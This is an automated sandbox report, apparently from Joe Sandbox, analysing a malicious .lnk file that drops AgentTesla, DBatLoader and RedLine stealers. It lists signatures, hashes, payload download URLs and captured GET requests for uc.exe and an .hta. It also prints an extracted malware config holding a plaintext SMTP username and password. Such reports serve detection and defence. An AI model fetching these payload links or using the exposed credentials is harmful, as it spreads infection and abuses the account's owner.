Windows Analysis Report
FT. 40FE CNY .xlsx.lnk

Overview

General Information

Sample name:	FT. 40FE CNY .xlsx.lnk
Analysis ID:	1430751
MD5:	82fde340f187a517e0feced1d4972363
SHA1:	07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256:	e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
Tags:	lnk
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected AgentTesla

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

Allocates memory in foreign processes

Drops PE files with a suspicious file extension

Found URL in windows shortcut file (LNK)

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Program Location with Network Connections

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Windows shortcut file (LNK) contains suspicious command line arguments

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Outbound SMTP Connections

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FT. 40FE CNY .xlsx.lnk

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: https://www.sessosesso.it/assets/aw/uc.exe	Avira URL Cloud: Label: malware

Found malware configuration

Source: cmd.exe.5360.20.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	ReversingLabs: Detection: 58%
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Virustotal: Detection: 38%	Perma Link
Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 28%
Source: C:\Users\Public\Libraries\netutils.dll	Virustotal: Detection: 47%	Perma Link
Source: C:\Users\user\AppData\Roaming\uc.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\uc.exe	Virustotal: Detection: 38%	Perma Link

Multi AV Scanner detection for submitted file

Source: FT. 40FE CNY .xlsx.lnk	ReversingLabs: Detection: 31%
Source: FT. 40FE CNY .xlsx.lnk	Virustotal: Detection: 24%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uc.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FT. 40FE CNY .xlsx.lnk

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack

Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source:	Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source:	Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

19_2_029858CC

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_0299C8AC InternetCheckConnectionA,

19_2_0299C8AC

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1Host: sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1Host: www.sessosesso.itConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 13.107.139.11 13.107.139.11

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1Host: sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1Host: www.sessosesso.itConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown

DNS traffic detected: queries for: www.sessosesso.it

Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.1634145596.0000029E324B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 0000000E.00000002.2531370506.0000021C38E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.irmaklarpaslanmaz.com.tr
Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
